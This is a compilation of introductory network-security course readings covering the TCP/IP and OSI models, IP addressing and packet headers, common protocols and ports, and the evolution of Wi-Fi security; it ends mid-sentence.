The TCP/IP model is a framework used to visualize how data is organized and transmitted
across a network. This model helps network engineers and network security analysts
conceptualize processes on the network and communicate where disruptions or security
threats occur.
The TCP/IP model has four layers: network access layer, internet layer, transport layer, and
application layer. When troubleshooting issues on the network, security professionals can
analyze and deduce which layer or layers an attack occurred based on what processes were
involved in an incident.
Network access layer
The network access layer, sometimes called the data link layer, deals with the creation of
data packets and their transmission across a network. This layer corresponds to the
physical hardware involved in network transmission. Hubs, modems, cables, and wiring are
all considered part of this layer. The address resolution protocol (ARP) is part of the
network access layer. ARP assists IP with directing data packets on the same physical
network by mapping IP addresses to MAC addresses on the same physical network.
Internet layer
The internet layer, sometimes referred to as the network layer, is responsible for ensuring
the delivery to the destination host, which potentially resides on a different network. It
ensures IP addresses are attached to data packets to indicate the location of the sender and
receiver. The internet layer also determines which protocol is responsible for delivering
the data packets and ensures the delivery to the destination host. Here are some of the
common protocols that operate at the internet layer:
Internet Protocol (IP). IP sends the data packets to the correct destination and relies
on the Transmission Control Protocol/User Datagram Protocol (TCP/UDP) to
deliver them to the corresponding service. IP packets allow communication between
two networks. They are routed from the sending network to the receiving network.
The TCP/UDP retransmits any data that is lost or corrupt.
● Internet Control Message Protocol (ICMP). The ICMP shares error information and
status updates of data packets. This is useful for detecting and troubleshooting
network errors. The ICMP reports information about packets that were dropped or
that disappeared in transit, issues with network connectivity, and packets
redirected to other routers.
●
Transport layer
The transport layer is responsible for delivering data between two systems or networks
and includes protocols to control the flow of traffic across a network. TCP and UDP are the
two transport protocols that occur at this layer.
Transmission Control Protocol
The Transmission Control Protocol (TCP) is an internet communication protocol that allows
two devices to form a connection and stream data. It ensures that data is reliably
transmitted to the destination service. TCP contains the port number of the intended
destination service, which resides in the TCP header of a TCP/IP packet.
User Datagram Protocol
The User Datagram Protocol (UDP) is a connectionless protocol that does not establish a
connection between devices before transmissions. It is used by applications that are not
concerned with the reliability of the transmission. Data sent over UDP is not tracked as
extensively as data sent using TCP. Because UDP does not establish network connections, it
is used mostly for performance sensitive applications that operate in real time, such as
video streaming.
Application layer
The application layer in the TCP/IP model is similar to the application, presentation, and
session layers of the OSI model. The application layer is responsible for making network
requests or responding to requests. This layer defines which internet services and
applications any user can access. Protocols in the application layer determine how the data
packets will interact with receiving devices. Some common protocols used on this layer
are:
●
●
●
●
●
Hypertext transfer protocol (HTTP)
Simple mail transfer protocol (SMTP)
Secure shell (SSH)
File transfer protocol (FTP)
Domain name system (DNS)
Application layer protocols rely on underlying layers to transfer the data across the
network.
TCP/IP model versus OSI model
The OSI visually organizes network protocols into different layers. Network professionals
often use this model to communicate with each other about potential sources of problems
or security threats when they occur.
The TCP/IP model combines multiple layers of the OSI model. There are many similarities
between the two models. Both models define standards for networking and divide the
network communication process into different layers. The TCP/IP model is a simplified
version of the OSI model.
Key takeaways
Both the TCP/IP and OSI models are conceptual models that help network professionals
visualize network processes and protocols in regard to data transmission between two or
more systems. The TCP/IP model contains four layers, and the OSI model contains seven
layers.
The OSI model
So far in this section of the course, you learned about the components of a network, network devices,
and how network communication occurs across a network.
All communication on a network is organized using network protocols. Previously, you learned about
the Transmission Control Protocol (TCP), which establishes connections between two devices, and the
Internet Protocol (IP), which is used for routing and addressing data packets as they travel between
devices on a network. This reading will continue to explore the seven layers of the Open Systems
Interconnection (OSI) model and the processes that occur at each layer. We will work backwards from
layer seven to layer one, going from the processes that involve the everyday network user to those that
involve the most basic networking components, like network cables and switches. This reading will also
review the main differences between the TCP/IP and OSI models.
The TCP/IP model vs. the OSI model
The TCP/IP model is a framework used to visualize how data is organized and transmitted across a
network. This model helps network engineers and network security analysts design the data network
and conceptualize processes on the network and communicate where disruptions or security threats
occur.
The TCP/IP model has four layers: network access layer, internet layer, transport layer, and application
layer. When analyzing network events, security professionals can determine what layer or layers an
attack occurred in based on what processes were involved in the incident.
The OSI model is a standardized concept that describes the seven layers computers use to communicate
and send data over the network. Network and security professionals often use this model to
communicate with each other about potential sources of problems or security threats when they occur.
Some organizations rely heavily on the TCP/IP model, while others prefer to use the OSI model. As a
security analyst, it’s important to be familiar with both models. Both the TCP/IP and OSI models are
useful for understanding how networks work.
Layer 7: Application layer
The application layer includes processes that directly involve the everyday user. This layer includes all
of the networking protocols that software applications use to connect a user to the internet. This
characteristic is the identifying feature of the application layer—user connection to the network via
applications and requests.
An example of a type of communication that happens at the application layer is using a web browser.
The internet browser uses HTTP or HTTPS to send and receive information from the website server. The
email application uses simple mail transfer protocol (SMTP) to send and receive email information. Also,
web browsers use the domain name system (DNS) protocol to translate website domain names into IP
addresses which identify the web server that hosts the information for the website.
Layer 6: Presentation layer
Functions at the presentation layer involve data translation and encryption for the network. This layer
adds to and replaces data with formats that can be understood by applications (layer 7) on both sending
and receiving systems. Formats at the user end may be different from those of the receiving system.
Processes at the presentation layer require the use of a standardized format.
Some formatting functions that occur at layer 6 include encryption, compression, and confirmation that
the character code set can be interpreted on the receiving system. One example of encryption that takes
place at this layer is SSL, which encrypts data between web servers and browsers as part of websites
with HTTPS.
Layer 5: Session layer
A session describes when a connection is established between two devices. An open session allows the
devices to communicate with each other. Session layer protocols occur to keep the session open while
data is being transferred and terminate the session once the transmission is complete.
The session layer is also responsible for activities such as authentication, reconnection, and setting
checkpoints during a data transfer. If a session is interrupted, checkpoints ensure that the transmission
picks up at the last session checkpoint when the connection resumes. Sessions include a request and
response between applications. Functions in the session layer respond to requests for service from
processes in the presentation layer (layer 6) and send requests for services to the transport layer (layer
4).
Layer 4: Transport layer
The transport layer is responsible for delivering data between devices. This layer also handles the speed
of data transfer, flow of the transfer, and breaking data down into smaller segments to make them easier
to transport. Segmentation is the process of dividing up a large data transmission into smaller pieces
that can be processed by the receiving system. These segments need to be reassembled at their
destination so they can be processed at the session layer (layer 5). The speed and rate of the
transmission also must match the connection speed of the destination system. TCP and UDP are
transport layer protocols.
Layer 3: Network layer
The network layer oversees receiving the frames from the data link layer (layer 2) and delivers them to
the intended destination. The intended destination can be found based on the address that resides in the
frame of the data packets. Data packets allow communication between two networks. These packets
include IP addresses that tell routers where to send them. They are routed from the sending network to
the receiving network.
Layer 2: Data link layer
The data link layer organizes sending and receiving data packets within a single network. The data link
layer is home to switches on the local network and network interface cards on local devices.
Protocols like network control protocol (NCP), high-level data link control (HDLC), and synchronous data
link control protocol (SDLC) are used at the data link layer.
Layer 1: Physical layer
As the name suggests, the physical layer corresponds to the physical hardware involved in network
transmission. Hubs, modems, and the cables and wiring that connect them are all considered part of the
physical layer. To travel across an ethernet or coaxial cable, a data packet needs to be translated into a
stream of 0s and 1s. The stream of 0s and 1s are sent across the physical wiring and cables, received,
and then passed on to higher levels of the OSI model.
Key takeaways
Both the TCP/IP and OSI models are conceptual models that help network professionals design network
processes and protocols in regard to data transmission between two or more systems. The OSI model
contains seven layers. Network and security professionals use the OSI model to communicate with each
other about potential sources of problems or security threats when they occur. Network engineers and
network security analysts use the TCP/IP and OSI models to conceptualize network processes and
communicate the location of disruptions or threats.
IP addresses and network communication
Let's learn about how IP addresses are used to communicate over a network. IP stands for
internet protocol. An internet protocol address, or IP address, is a unique string of
characters that identifies a location of a device on the internet. Each device on the internet
has a unique IP address, just like every house on a street has its own mailing address. There
are two types of IP addresses: IP version 4, or IPv4, and IP version 6, or IPv6. Let's look at
examples
of an IPv4 address. IPv4 addresses are written as four, 1, 2, or 3-digit numbers
separated by a decimal point. In the early days of the internet, IP addresses were all IPV4.
But as the use of the internet grew, all the IPv4 addresses started to get used up, so IPv6
was developed. IPv6 addresses are made up of 32 characters. The length of the IPv6
address will allow for more
devices to be connected to the internet without running out of addresses as quickly as IPv4.
IP addresses can be either public or private. Your internet service provider assigns a public
IP address that is connected to your geographic location. When network communications
goes out from your device on the internet, they all have the same public-facing address. Just
like all the roommates in one home share the same mailing address, all the devices on
a network share the same public-facing IP address. Private IP addresses are only seen by
other devices on the same local network. This means that all the devices on your home
network can
communicate with each other using unique IP addresses that the rest of the
internet can't see. Another kind of address used in network communications
is called a MAC address. A MAC address is a unique alphanumeric identifier that is assigned
to each physical device on a network. When a switch receives a data packet, it reads the
MAC address of the destination device and maps it to a port. It then keeps this information
in a MAC address table. Think of the MAC address table like an address book that the switch
uses to direct data packets to the appropriate device.
Components of network layer communication
In the reading about the OSI model, you learned about the seven layers of the OSI model that are used to
conceptualize the way data is transmitted across the internet. In this reading, you will learn more about
operations that take place at layer 3 of the OSI model: the network layer.
Operations at the network layer
Functions at the network layer organize the addressing and delivery of data packets across the network
and internet from the host device to the destination device. This includes directing the packets from one
router to another router across the internet, based on the internet protocol (IP) address of the
destination network. The destination IP address is contained within the header of each data packet. This
address will be stored for future routing purposes in routing tables along the packet’s path to its
destination.
All data packets include an IP address; this is referred to as an IP packet or datagram. A router uses the
IP address to route packets from network to network based on information contained in the IP header of
a data packet. Header information communicates more than just the address of the destination. It also
includes information such as the source IP address, the size of the packet, and which protocol will be
used for the data portion of the packet.
Format of an IPv4 packet
Next, you can review the format of an IP version 4 (IPv4) packet and review a detailed graphic of the
packet header. An IPv4 packet is made up of two sections, the header and the data:
●
●
An IPv4 header format is determined by the IPv4 protocol and includes the IP routing
information that devices use to direct the packet. The size of the IPv4 header ranges from 20 to
60 bytes. The first 20 bytes are a fixed set of information containing data such as the source and
destination IP address, header length, and total length of the packet. The last set of bytes can
range from 0 to 40 and consists of the options field.
The length of the data section of an IPv4 packet can vary greatly in size. However, the maximum
possible size of an IPv4 packet is 65,535 bytes. It contains the message being transferred over
the internet, like website information or email text.
There are 13 fields within the header of an IPv4 packet:
●
●
●
●
●
●
●
●
●
●
●
●
●
Version (VER): This 4 bit component tells receiving devices what protocol the packet is using.
The packet used in the illustration above is an IPv4 packet.
IP Header Length (HLEN or IHL): HLEN is the packet’s header length. This value indicates where
the packet header ends and the data segment begins.
Type of Service (ToS): Routers prioritize packets for delivery to maintain quality of service on
the network. The ToS field provides the router with this information.
Total Length: This field communicates the total length of the entire IP packet, including the
header and data. The maximum size of an IPv4 packet is 65,535 bytes.
Identification: For IPv4 packets that are larger than 65, 535 bytes, the packets are divided, or
fragmented, into smaller IP packets. The identification field provides a unique identifier for all
the fragments of the original IP packet so that they can be reassembled once they reach their
destination.
Flags: This field provides the routing device with more information about whether the original
packet has been fragmented and if there are more fragments in transit.
Fragmentation Offset: The fragment offset field tells routing devices where in the original packet
the fragment belongs.
Time to Live (TTL): TTL prevents data packets from being forwarded by routers indefinitely. It
contains a counter that is set by the source. The counter is decremented by one as it passes
through each router along its path. When the TTL counter reaches zero, the router currently
holding the packet will discard the packet and return an ICMP Time Exceeded error message to
the sender.
Protocol: The protocol field tells the receiving device which protocol will be used for the data
portion of the packet.
Header Checksum: The header checksum field contains a checksum that can be used to detect
corruption of the IP header in transit. Corrupted packets are discarded.
Source IP Address: The source IP address is the IPv4 address of the sending device.
Destination IP Address: The destination IP address is the IPv4 address of the destination device.
Options: The options field allows for security options to be applied to the packet if the HLEN
value is greater than five. The field communicates these options to the routing devices.
Difference between IPv4 and IPv6
In an earlier part of this course, you learned about the history of IP addressing. As the internet grew, it
became clear that all of the IPv4 addresses would eventually be depleted; this is called IPv4 address
exhaustion. At the time, no one had anticipated how many computing devices would need an IP address.
IPv6 was developed to mitigate IPv4 address exhaustion and other related concerns.
One of the key differences between IPv4 and IPv6 is the length of the addresses. IPv4 addresses are
made of four decimal numbers, each ranging from 0 to 255. Together they span numeric, made of 4
bytes, and allow for up to 4.3 billion possible addresses. IPv4 addresses are made up of four strings and
the numbers range from 0 to 255. An example of an IPv4 address would be: 198.51.100.0. IPv6
addresses are made of eight hexadecimal numbers consisting of four hexadecimal digits.,Together, they
span made up of 16 bytes, and allow for up to 340 undecillion addresses (340 followed by 36 zeros). An
example of an IPv6 address would be: 2002:0db8:0000:0000:0000:ff21:0023:1234.
There are also some differences in the layout of an IPv6 packet header. The IPv6 header format is much
simpler than IPv4. For example, the IPv4 Header includes the IHL, Identification, and Flags fields,
whereas the IPv6 does not. The IPv6 header only introduces the Flow Label field, where the Flow Label
identifies a packet as requiring special handling by other IPv6 routers.
There are some important security differences between IPv4 and IPv6. IPv6 offers more efficient routing
and eliminates private address collisions that can occur on IPv4 when two devices on the same network
are attempting to use the same address.
Key takeaways
Analyzing the different fields in an IP data packet can be used to find out important security information
about the packet. Some examples of security-related information found in IP address packets are: where
the packet is coming from, where it’s going, and which protocol it’s using. Understanding the data in an
IP data packet will allow you to make critical decisions about the security implications of packets that
you inspect.
Glossary terms from module 1
Terms and definitions from Course 3, Module 1
Bandwidth: The maximum data transmission capacity over a network, measured by bits
per second
Cloud computing: The practice of using remote servers, application, and network services
that are hosted on the internet instead of on local physical devices
Cloud network: A collection of servers or computers that stores resources and data in
remote data centers that can be accessed via the internet
Data packet: A basic unit of information that travels from one device to another within a
network
Hub: A network device that broadcasts information to every device on the network
Internet Protocol (IP): A set of standards used for routing and addressing data packets as
they travel between devices on a network
Internet Protocol (IP) address: A unique string of characters that identifies the location of a
device on the internet
Local Area Network (LAN): A network that spans small areas like an office building, a
school, or a home
Media Access Control (MAC) address: A unique alphanumeric identifier that is assigned to
each physical device on a network
Modem: A device that connects your router to the internet and brings internet access to the
LAN
Network: A group of connected devices
Open systems interconnection (OSI) model: A standardized concept that describes the
seven layers computers use to communicate and send data over the network
Packet sniffing: The practice of capturing and inspecting data packets across a network
Port: A software-based location that organizes the sending and receiving of data between
devices on a network
Router: A network device that connects multiple networks together
Speed: The rate at which a device sends and receives data, measured by bits per second
Switch: A device that makes connections between specific devices on a network by sending
and receiving data between them
TCP/IP model: A framework used to visualize how data is organized and transmitted across
a network
Transmission Control Protocol (TCP): An internet communication protocol that allows two
devices to form a connection and stream data
User Datagram Protocol (UDP): A connectionless protocol that does not establish a
connection between devices before transmissions
Wide Area Network (WAN): A network that spans a large geographic area like a city, state,
or country
Network Protocols
In this section, you'll learn about how networks operate using
tools and protocols. These are the concepts
that you'll use every day in your work as a security analyst. The tools and protocols you'll
learn in this section of the program will help you protect your organization's
network from attacks. Did you know that malicious actors can take advantage of data moving from one
device to another on a network? Thankfully, there are tools and protocols to ensure the network stays
protected against this type of threat. As an example, I once
identified an attack based solely on the fact they were using the wrong protocol. The network traffic
volumes were right, and it was coming from a trusted IP, but it was on the wrong protocol, which tipped
us off enough to shut down the attack before they caused real damage. First, we'll discuss some common
network protocols. Then we'll discuss virtual private networks, or VPNs. And finally, we'll learn about
firewall security zones and proxy servers.
Networks benefit from having rules. Rules ensure that data sent over the network gets to
the right place. These rules are known as network protocols. Network protocols are a set of rules used
by two or more devices on a network to describe
the order of delivery and the structure of the data. Let's use a scenario
to demonstrate a few different types of network protocols and how they work
together on a network. Say you want to access your favorite recipe website. You go to the address
bar at the top of your browser and type in the website's address. For example:
www.yummyrecipesforme.org. Before you gain access to the website, your device will establish
communications with a web server. That communication uses a protocol called the Transmission Control
Protocol, or TCP. TCP is an internet communications protocol that allows two devices to form a connection
and stream data. TCP also verifies both devices before allowing any further communications to take
place. This is often referred to as a handshake. Once communication is established using a TCP
handshake, a request is made
to the network. Using our example, we have requested data from the Yummy
Recipes For Me server. Their servers will respond to that request and send data packets back to your
device so that you can view the web page. As data packets move across the network, they move between
network devices such as routers. The Address Resolution Protocol, or ARP, is used to determine the MAC
address of the next router or device on the path. This ensures that the data gets to the right place. Now
the communication has been established and the
destination device is known, it's time to access the Yummy Recipes For Me website. The Hypertext
Transfer Protocol Secure, or HTTPS, is a network protocol that provides a secure method of
communication between client and website servers. It allows your web browser to securely send a
request for a webpage to the Yummy Recipes For Me server and receive a webpage
as a response. Next comes a protocol called the Domain Name System, or DNS, which is a network
protocol that translate internet domain name into IP addresses. The DNS protocol sends the domain
name and the web address to a DNS server that retrieves the IP address of the website you were trying
to access, in this case, Yummy Recipes For Me. The IP address is included
as a destination address for the data packets traveling to the Yummy Recipes For Me web server. So just
by visiting one website, the device on your networks are using four different protocols: TCP, ARP,
HTTPS, and DNS. These are just some of the protocols used in network communications. To help you
learn more about the different protocols, we'll discuss them further in an upcoming course material. But
how do these protocols relate to security? Well, on the Yummy Recipes For Me website example, we
used HTTPS, which is a secure protocol that requests a webpage from a web server. HTTPS encrypts
data using the Secure Sockets Layer and Transport Layer Security, otherwise known as SSL/TLS. This
helps keep the information secure from malicious actors who want to steal valuable information. That's a
lot of information and a lot of protocols to remember. Throughout your career as a security analyst,
you'll become more familiar with network protocols and use them in your daily activities.
Common network protocols
In this section of the course, you learned about network protocols and how they organize
communication over a network. This reading will discuss network protocols in more depth and review
some basic protocols that you have learned previously. You will also learn new protocols and discuss
some of the ways protocols are involved in network security.
Overview of network protocols
A network protocol is a set of rules used by two or more devices on a network to describe the order of
delivery and the structure of data. Network protocols serve as instructions that come with the
information in the data packet. These instructions tell the receiving device what to do with the data.
Protocols are like a common language that allows devices all across the world to communicate with and
understand each other.
Even though network protocols perform an essential function in network communication, security
analysts should still understand their associated security implications. Some protocols have
vulnerabilities that malicious actors exploit. For example, a nefarious actor could use the Domain Name
System (DNS) protocol, which resolves web addresses to IP addresses, to divert traffic from a legitimate
website to a malicious website containing malware. You’ll learn more about this topic in upcoming
course materials.
Three categories of network protocols
Network protocols can be divided into three main categories: communication protocols, management
protocols, and security protocols. There are dozens of different network protocols, but you don’t need to
memorize all of them for an entry-level security analyst role. However, it’s important for you to know
the ones listed in this reading.
Communication protocols
Communication protocols govern the exchange of information in network transmission. They dictate
how the data is transmitted between devices and the timing of the communication. They also include
methods to recover data lost in transit. Here are a few of them.
●
●
●
●
Transmission Control Protocol (TCP) is an internet communication protocol that allows two
devices to form a connection and stream data. TCP uses a three-way handshake process. First,
the device sends a synchronize (SYN) request to a server. Then the server responds with a
SYN/ACK packet to acknowledge receipt of the device's request. Once the server receives the
final ACK packet from the device, a TCP connection is established. In the TCP/IP model, TCP
occurs at the transport layer.
User Datagram Protocol (UDP) is a connectionless protocol that does not establish a connection
between devices before a transmission. This makes it less reliable than TCP. But it also means
that it works well for transmissions that need to get to their destination quickly. For example,
one use of UDP is for internet gaming transmissions. In the TCP/IP model, UDP occurs at the
transport layer.
Hypertext Transfer Protocol (HTTP) is an application layer protocol that provides a method of
communication between clients and website servers. HTTP uses port 80. HTTP is considered
insecure, so it is being replaced on most websites by a secure version, called HTTPS. However,
there are still many websites that use the insecure HTTP protocol. In the TCP/IP model, HTTP
occurs at the application layer.
Domain Name System (DNS) is a protocol that translates internet domain names into IP
addresses. When a client computer wishes to access a website domain using their internet
browser, a query is sent to a dedicated DNS server. The DNS server then looks up the IP address
that corresponds to the website domain. DNS normally uses UDP on port 53. However, if the
DNS reply to a request is large, it will switch to using the TCP protocol. In the TCP/IP model,
DNS occurs at the application layer.
Management Protocols
The next category of network protocols is management protocols. Management protocols are used for
monitoring and managing activity on a network. They include protocols for error reporting and
optimizing performance on the network.
●
●
Simple Network Management Protocol (SNMP) is a network protocol used for monitoring and
managing devices on a network. SNMP can reset a password on a network device or change its
baseline configuration. It can also send requests to network devices for a report on how much of
the network’s bandwidth is being used up. In the TCP/IP model, SNMP occurs at the application
layer.
Internet Control Message Protocol (ICMP) is an internet protocol used by devices to tell each
other about data transmission errors across the network. ICMP is used by a receiving device to
send a report to the sending device about the data transmission. ICMP is commonly used as a
quick way to troubleshoot network connectivity and latency by issuing the “ping” command on a
Linux operating system. In the TCP/IP model, ICMP occurs at the internet layer.
Security Protocols
Security protocols are network protocols that ensure that data is sent and received securely across a
network. Security protocols use encryption algorithms to protect data in transit. Below are some
common security protocols.
●
●
Hypertext Transfer Protocol Secure (HTTPS) is a network protocol that provides a secure
method of communication between clients and website servers. HTTPS is a secure version of
HTTP that uses secure sockets layer/transport layer security (SSL/TLS) encryption on all
transmissions so that malicious actors cannot read the information contained. HTTPS uses port
443. In the TCP/IP model, HTTPS occurs at the application layer.
Secure File Transfer Protocol (SFTP) is a secure protocol used to transfer files from one device to
another over a network. SFTP uses secure shell (SSH), typically through TCP port 22. SSH uses
Advanced Encryption Standard (AES) and other types of encryption to ensure that unintended
recipients cannot intercept the transmissions. In the TCP/IP model, SFTP occurs at the
application layer. SFTP is used often with cloud storage. Every time a user uploads or downloads
a file from cloud storage, the file is transferred using the SFTP protocol.
Note: The encryption protocols mentioned do not conceal the source or destination IP address of
network traffic. This means a malicious actor can still learn some basic information about the network
traffic if they intercept it.
Key takeaways
The protocols you learned about in this reading are basic networking protocols that entry-level
cybersecurity analysts should know. Understanding how protocols function on a network is essential.
Cybersecurity analysts can leverage their knowledge of protocols to successfully mitigate vulnerabilities
on a network and potentially prevent future attacks.
Additional network protocols
In previous readings and videos, you learned how network protocols organize the sending
and receiving of data across a network. You also learned that protocols can be divided into
three categories: communication protocols, management protocols, and security protocols.
This reading will introduce you to a few additional concepts and protocols that will come
up regularly in your work as a security analyst. Some protocols are assigned port numbers
by the Internet Assigned Numbers Authority (IANA). These port numbers are included in
the description of each protocol, if assigned.
Network Address Translation
The devices on your local home or office network each have a private IP address that they
use to communicate directly with each other. In order for the devices with private IP
addresses to communicate with the public internet, they need to have a public IP address.
Otherwise, responses will not be routed correctly. Instead of having a dedicated public IP
address for each of the devices on the local network, the router can replace a private source
IP address with its public IP address and perform the reverse operation for responses. This
process is known as Network Address Translation (NAT) and it generally requires a router
or firewall to be specifically configured to perform NAT. NAT is a part of layer 2 (internet
layer) and layer 3 (transport layer) of the TCP/IP model.
Private IP Addresses
●
●
●
●
Assigned by network admins
Unique only within private network
No cost to use
Address ranges:
o 10.0.0.0-10.255.255.255
o 172.16.0.0-172.31.255.255
o 192.168.0.0-192.168.255.255
Public IP Addresses
● Assigned by ISP and IANA
● Unique address in global internet
● Costs to lease a public IP address
● Address ranges:
o 1.0.0.0-9.255.255.255
o 11.0.0.0-126.255.255.255
o 128.0.0.0-172.15.255.255
o 172.32.0.0-192.167.255.255
o 192.169.0.0-233.255.255.255
Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is in the management family of network
protocols. DHCP is an application layer protocol used on a network to configure devices. It
assigns a unique IP address and provides the addresses of the appropriate DNS server and
default gateway for each device. DHCP servers operate on UDP port 67 while DHCP clients
operate on UDP port 68.
Address Resolution Protocol
By now, you are familiar with IP and MAC addresses. You’ve learned that each device on a
network has both an IP address that identifies it on the network and a MAC address that is
unique to that network interface. A device’s IP address may change over time, but its MAC
address is permanent. Address Resolution Protocol (ARP) is mainly a network access layer
protocol in the TCP/IP model used to translate the IP addresses that are found in data
packets into the MAC address of the hardware device.
Each device on the network performs ARP and keeps track of matching IP and MAC
addresses in an ARP cache. ARP does not have a specific port number.
Telnet
Telnet is an application layer protocol that allows a device to communicate with another
device or server. Telnet sends all information in clear text. It uses command line prompts to
control another device similar to secure shell (SSH), but Telnet is not as secure as SSH.
Telnet can be used to connect to local or remote devices and uses TCP port 23.
Secure shell
Secure shell protocol (SSH) is used to create a secure connection with a remote system.
This application layer protocol provides an alternative for secure authentication and
encrypted communication. SSH operates over the TCP port 22 and is a replacement for less
secure protocols, such as Telnet.
Post office protocol
Post office protocol (POP) is an application layer (layer 4 of the TCP/IP model) protocol
used to manage and retrieve email from a mail server. Many organizations have a dedicated
mail server on the network that handles incoming and outgoing mail for users on the
network. User devices will send requests to the remote mail server and download email
messages locally. If you have ever refreshed your email application and had new emails
populate in your inbox, you are experiencing POP and internet message access protocol
(IMAP) in action. Unencrypted, plaintext authentication uses TCP/UDP port 110 and
encrypted emails use Secure Sockets Layer/Transport Layer Security (SSL/TLS) over
TCP/UDP port 995. When using POP, mail must finish downloading on a local device before
it can be read and it does not allow a user to sync emails.
Internet Message Access Protocol (IMAP)
IMAP is used for incoming email. It downloads the headers of emails, but not the content.
The content remains on the email server, which allows users to access their email from
multiple devices. IMAP uses TCP port 143 for unencrypted email and TCP port 993 over the
TLS protocol. Using IMAP allows users to partially read email before it is finished
downloading and to sync emails. However, IMAP is slower than POP3.
Simple Mail Transfer Protocol
Simple Mail Transfer Protocol (SMTP) is used to transmit and route email from the sender
to the recipient’s address. SMTP works with Message Transfer Agent (MTA) software,
which searches DNS servers to resolve email addresses to IP addresses, to ensure emails
reach their intended destination. SMTP uses TCP/UDP port 25 for unencrypted emails and
TCP/UDP port 587 using TLS for encrypted emails. The TCP port 25 is often used by highvolume spam. SMTP helps to filter out spam by regulating how many emails a source can
send at a time.
Protocols and port numbers
Remember that port numbers are used by network devices to determine what should be
done with the information contained in each data packet once they reach their destination.
Firewalls can filter out unwanted traffic based on port numbers. For example, an
organization may configure a firewall to only allow access to TCP port 995 (POP3) by IP
addresses belonging to the organization.
As a security analyst, you will need to know about many of the protocols and port numbers
mentioned in this course. They may be used to determine your technical knowledge in
interviews, so it’s a good idea to memorize them. You will also learn about new protocols
on the job in a security position.
Key takeaways
As a cybersecurity analyst, you will encounter various common protocols in your everyday
work. The protocols covered in this reading include NAT, DHCP, ARP, Telnet, SSH, POP3,
IMAP, and SMTP. It is equally important to understand where each protocol is structured in
the TCP/IP model and which ports they occupy.
Wireless Protocols a class of communication protocols called the IEEE802.11. IEEE802.11,
commonly known as Wi-Fi, is a set of standards that define communications for wireless LANs.
IEEE stands for the Institute of Electrical and Electronics Engineers, which is an organization that
maintains Wi-Fi standards, and 802.11 is a suite of protocols used in wireless communications. WiFi protocols have adapted over the years to become more secure and reliable to provide the same
level of security as a wired connection. In 2004, a security protocol called the Wi-Fi Protected
Access, or WPA, was introduced. WPA is a wireless security protocol for devices to connect to the
internet. Since then, WPA has evolved into newer versions, like WPA2 and WPA3, which include
further security improvements, like more advanced encryption. As a security analyst, you might be
responsible for making sure that the wireless connections in your organization are secure. Let's
learn more about security measures.
The evolution of wireless security protocols
In the early days of the internet, all internet communication happened across physical cables. It wasn’t
until the mid-1980s that authorities in the United States designated a spectrum of radio wave
frequencies that could be used without a license, so there was more opportunity for the internet to
expand.
In the late 1990s and early 2000s, technologies were developed to send and receive data over radio.
Today, users access wireless internet through laptops, smart phones, tablets, and desktops. Smart
devices, like thermostats, door locks, and security cameras, also use wireless internet to communicate
with each other and with services on the internet.
Introduction to wireless communication protocols
Many people today refer to wireless internet as Wi-Fi. Wi-Fi refers to a set of standards that define
communication for wireless LANs. Wi-Fi is a marketing term commissioned by the Wireless Ethernet
Compatibility Alliance (WECA). WECA has since renamed their organization Wi-Fi Alliance.
Wi-Fi standards and protocols are based on the 802.11 family of internet communication standards
determined by the Institute of Electrical and Electronics Engineers (IEEE). So, as a security analyst, you
might also see Wi-Fi referred to as IEEE 802.11.
Wi-Fi communications are secured by wireless networking protocols. Wireless security protocols have
evolved over the years, helping to identify and resolve vulnerabilities with more advanced wireless
technologies.
In this reading, you will learn about the evolution of wireless security protocols from WEP to WPA,
WPA2, and WPA3. You’ll also learn how the Wireless Application Protocol was used for mobile internet
communications.
Wired Equivalent Privacy
Wired equivalent privacy (WEP) is a wireless security protocol designed to provide users with the same
level of privacy on wireless network connections as they have on wired network connections. WEP was
developed in 1999 and is the oldest of the wireless security standards.
WEP is largely out of use today, but security analysts should still understand WEP in case they
encounter it. For example, a network router might have used WEP as the default security protocol and
the network administrator never changed it. Or, devices on a network might be too old to support newer
Wi-Fi security protocols. Nevertheless, a malicious actor could potentially break the WEP encryption, so
it’s now considered a high-risk security protocol.
Wi-Fi Protected Access
Wi-Fi Protected Access (WPA) was developed in 2003 to improve upon WEP, address the security issues
that it presented, and replace it. WPA was always intended to be a transitional measure so backwards
compatibility could be established with older hardware.
The flaws with WEP were in the protocol itself and how the encryption was used. WPA addressed this
weakness by using a protocol called Temporal Key Integrity Protocol (TKIP). WPA encryption algorithm
uses larger secret keys than WEPs, making it more difficult to guess the key by trial and error.
WPA also includes a message integrity check that includes a message authentication tag with each
transmission. If a malicious actor attempts to alter the transmission in any way or resend at another
time, WPA’s message integrity check will identify the attack and reject the transmission.
Despite the security improvements of WPA, it still has vulnerabilities. Malicious actors can use a key
reinstallation attack (or KRACK attack) to decrypt transmissions using WPA. Attackers can insert
themselves in the WPA authentication handshake process and insert a new encryption key instead of the
dynamic one assigned by WPA. If they set the new key to all zeros, it is as if the transmission is not
encrypted at all.
Because of this significant vulnerability, WPA was replaced with an updated version of the protocol
called WPA2.
WPA2 & WPA3
WPA2
The second version of Wi-Fi Protected Access—known as WPA2—was released in 2004. WPA2
improves upon WPA by using the Advanced Encryption Standard (AES). WPA2 also improves upon
WPA’s use of TKIP. WPA2 uses the Counter Mode Cipher Block Chain Message Authentication Code
Protocol (CCMP), which provides encapsulation and ensures message authentication and integrity.
Because of the strength of WPA2, it is considered the security standard for all Wi-Fi transmissions today.
WPA2, like its predecessor, is vulnerable to KRACK attacks. This led to the development of WPA3 in
2018.
Personal
WPA2 personal mode is best suited for home networks for a variety of reasons. It is easy to implement,
initial setup takes less time for personal than enterprise version. The global passphrase for WPA2
personal version needs to be applied to each individual computer and access point in a network. This
makes it ideal for home networks, but unmanageable for organizations.
Enterprise
WPA2 enterprise mode works best for business applications. It provides the necessary security for
wireless networks in business settings. The initial setup is more complicated than WPA2 personal mode,
but enterprise mode offers individualized and centralized control over the Wi-Fi access to a business
network. This means that network administrators can grant or remove user access to a network at any
time. Users never have access to encryption keys, this prevents potential attackers from recovering
network keys on individual computers.
WPA3
WPA3 is a secure Wi-Fi protocol and is growing in usage as more WPA3 compatible devices are released.
These are the key differences between WPA2 and WPA3:
●
●
●
WPA3 addresses the authentication handshake vulnerability to KRACK attacks, which is present
in WPA2.
WPA3 uses Simultaneous Authentication of Equals (SAE), a password-authenticated, cipher-keysharing agreement. This prevents attackers from downloading data from wireless network
connections to their systems to attempt to decode it.
WPA3 has increased encryption to make passwords more secure by using 128-bit encryption,
with WPA3-Enterprise mode offering optional 192-bit encryption.
Key takeaways
As a security analyst, knowing the history of how Wi-Fi security protocols developed helps you to better
